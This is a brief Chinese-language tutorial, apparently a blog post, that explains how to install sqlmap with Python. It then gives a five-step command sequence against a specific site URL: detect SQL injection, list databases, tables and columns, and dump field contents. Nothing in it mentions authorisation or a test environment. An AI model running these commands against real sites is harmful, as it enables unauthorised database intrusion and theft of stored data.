sql神器SQLMAP

sqlmap 是一个基于命令行的半自动化sql注入攻击工具，成功执行sqlmap，需要安装python（建议用python2）+sqlmap

---自动百度安装

tip：

1、python安装后，设置系统环境变量--path，最终cmd下输出python后有输出即可。

2、sqlmap直接安装到python目录下（例如直接解压到D:/Python27）,生成--sqlmapproject-sqlmap-5650abb，

cmd下执行后有如下图展示，代表成功

开始sql注入尝试

1、扫描站点是否存在注入漏洞

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"

2、扫描数据库

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  --dbs

3、扫描数据库表

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  --tables

4、扫描字段名

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  -T 表名  --columns

5、获取字段内容

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  -T 表名  -C 字段值  --dump